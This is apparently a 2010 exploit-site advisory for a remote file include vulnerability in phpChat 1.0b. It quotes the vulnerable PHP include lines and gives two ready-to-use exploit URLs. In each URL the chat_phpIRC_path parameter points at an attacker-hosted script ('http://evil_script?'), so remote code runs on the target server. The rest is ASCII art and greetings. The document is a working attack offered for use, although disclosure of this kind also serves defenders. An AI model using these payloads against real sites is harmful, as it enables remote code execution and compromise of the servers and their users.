phpChat 1.0b Remote File Include Vulnerability
Posted on 29 March 2010
============================================== phpChat 1.0b Remote File Include Vulnerability ============================================== -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= phpChat <= 1.0b - Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= o o / _ o __| / |__ o _ o / o /| | / __o o | o/ o/__ / | /| / / | /) | ( /o / ) | ( / | / / Discovered by: Febr?o - febronio[at]linuxmail.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= CODE: include($chat_phpIRC_path."/phpIRC.inc.php3"); include($chat_phpIRC_path."/phpIRC.php3"); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: http://target/[script_path]/chat_actions.php3?chat_phpIRC_path=http://evil_script? http://target/[script_path]/chat_bot.php3?chat_phpIRC_path=http://evil_script? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanx for: BLaCK KaME RaIDER _-~~ /(_|_-~ / /~==[] ____-------_ ______________ / (_ //(�)~~~~ Kawasaki ~ /' ___/ ~~~~/ (| ~~--__ | ___/_____---~~~ ZX12r . ___ ~~--__ ____ /----~~~~ _/ __--~~' ~ \\ ~~-_ ~-_____/____----~~ __--~~___ _ ----/ \\ ~-_ ~-_ __--~~----~~_ ]= _-~ ___ / /__ ~~~ ~-_ ~~~~~~~~/~~~ _-~ ~-_ /-~~~_-|/ / ~ _) ~ /~~~~~---__-----_ ; / /_//` __--~~/_ `\_____/~~~~~~~~~~~~~--_/ . | | ((*))/ | | __--~~ /o |-----------_____( 0)_) | | | |~| / | )-~~ 0 ) O~~~~~~/~--------|~| / , ~-----~ / / ~~~~~~~~~~~/_/' ~-----~ / ~-_ _-~ `---------------------------' `-_ _-~ ~ ----- ~ ~ ----- ~ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Inj3ct0r.com [2010-03-29]
